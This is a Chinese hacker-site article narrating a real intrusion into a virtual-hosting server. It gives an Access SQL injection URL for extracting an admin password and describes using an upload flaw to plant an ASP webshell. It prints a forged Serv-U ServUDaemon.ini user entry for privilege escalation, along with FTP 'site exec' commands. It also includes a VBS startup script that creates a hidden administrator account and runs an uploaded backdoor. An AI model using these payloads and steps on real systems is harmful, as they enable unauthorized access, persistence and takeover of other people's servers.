| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 |

您现在的位置： 中国X黑客小组 >> 技术文章 >> 黑客技术 >> 入侵检测 >> 文章正文 用户登录 新用户注册

对一台虚拟主机服务器的渗透    热      【字体：小 大】
对一台虚拟主机服务器的渗透
作者：佚名    文章来源：网络    点击数：    更新时间：2007-9-16
前几天听一树说了惊云下载系统的漏洞 问题文件出在admin/user.asp 提交 http://www.xxx.com/down/admin/user.asp?user=admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1 就相当于: select * from UserInfo where user=’admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1’" 利用access注入得到管理员密码 上面有一个文件upfile.htm 手工利用了下动网的upfile.asp漏洞 就成功上传了个asp木马 然后那个虚拟主机的c，d盘是NTFS分区 不能访问E盘装着servu，php，webmail， F盘是虚拟站点 servu安装目录可写～ 本来打算替换他servu文件的～但是觉的太麻烦 还容易让管理员怀疑 想起servu的本地提升来了 在自己计算机上装了个servu 添加了一个用户，设置为系统管理员，目录C:\，具有可执行权限 然后去servu安装目录里看ServUDaemon.ini 格式是这样的 [GLOBAL] Version=5.0.0.11 LocalSetupPassword=072C63105200180D5C07170A7E3E LocalSetupPortNo=60628 ProcessID=972 [DOMAINS] Domain1=192.168.0.102||21|向导产生域|1|0|0 Domain2=192.168.0.102||2121|123|2|0|0 [Domain1] User1=www|1|0 [USER=www|1] Password=ih0C292E1AC82920B7F384007F302A1296 HomeDir=D:\xiaoben TimeOut=600 Note1="Wizard generated account" Access1=D:\xiaoben|RLPWAMCD SKEYValues= [Domain2] User1=rover|1|0 User2=123|1|0 [USER=rover|2] Password=dx5D12C060F16C7166779414FA038E881D HomeDir=c:\ TimeOut=600 Maintenance=System Access1=C:\|RWAMELCDP SKEYValues= [USER=123|2] Password=kv3F6EED70340AD1478ADF95963A07FD00 HomeDir=c:\ TimeOut=600 Access1=C:\|RWAMLCDP SKEYValues= －－－－－－－－－－－－－－－－ 其中rover用户就是我添加的那个 在虚拟主机的网页木马上打开虚拟机的ServUDaemon.ini 访照我本地的INI写进一个用户进去 User1=rover|1|0 [USER=rover|2] Password=dx5D12C060F16C7166779414FA038E881D HomeDir=c:\ TimeOut=600 Maintenance=System Access1=C:\|RWAMELCDP SKEYValues= 保存～ 用我新建的用户和密码连接～ 好的，还是连上了 ftp ftp>open ip  Connected to ip. 220 Serv-U FTP Server v5.0.0.4 for WinSock ready... User (ip:(none)): id //输入构造的用户 331 User name okay, please send complete E-mail address as password. Password:password //密码 230 User logged in, proceed. ftp> cd winnt //进入win2k的winnt目录，如果是winxp或者是windows server 2003就应该为windows目录。 250 Directory changed to /WINNT ftp>cd system32 //进入system32目录 250 Directory changed to /WINNT/system32 ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe文件加用户。 提示没有权限～郁闷～ 但是我们有对C盘的访问权限了是不～hoho～ 把后门（server.exe）传他system32目录 然后写一个VBs教本 set wshshell=createobject ("wscript.shell")  a=wshshell.run ("cmd.exe /c net user tsinternetuser rover1234 /add",0)  b=wshshell.run ("cmd.exe /c net localgroup Administrators tsinternetuser /add",0) b=wshshell.run ("cmd.exe /c net user tsinternetuser /active:yes",0) b=wshshell.run ("cmd.exe /c server.exe",0) 存为HELP.vbe 这个教本的作用是修改tsinternetuser用户密码为rover1234 并且提升为管理员 然后执行system32目录下的server.exe 把这个教本传他C:\Documents and Settings\All Users\「开始」菜单\程序\启动 目录 这样管理员只要一登陆就会执行那个教本～ 接下来就是等了～ 等他登陆～ 等了一段时间（看了一部蜘蛛侠的时间吧）～ 连接后门～得到admin权限的shell hoho～ 接下来是善后工作了～就不说了 今天心情非常糟～有一些事情压的我喘不过气来 考试的时候当老师面把卷子撕了，然后扬步走了～ 妈妈的～过程写的很乱～见谅
文章录入：IceRiver    责任编辑：admin
	上一篇文章： MSSQL数据库SA权限入侵的感悟 下一篇文章： 另类巧妙的思路:旁门左道的入侵
【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				对一刷网站访问量的小马分析 对一有防火墙机器的渗透 如何才能搭建一台自己的BT下 进入一台服务器后隐藏自己的 你bt我更bt--对一台bt主机的 构建一台安全的win2k肉鸡 一次真实的入侵--记对一足球 实战入侵新浪分站的一台服务 对一网站注入过程步骤的实例 对一有防火墙的机子的渗透

网友评论：（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）

关于我们 - 版权声明 - 帮助(？) - 广告服务 - 联系我们 - 友情链接 - 用户注册 -	Powered by ICE RIVER - STUDIO

» CnXHacker.CoM

© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved.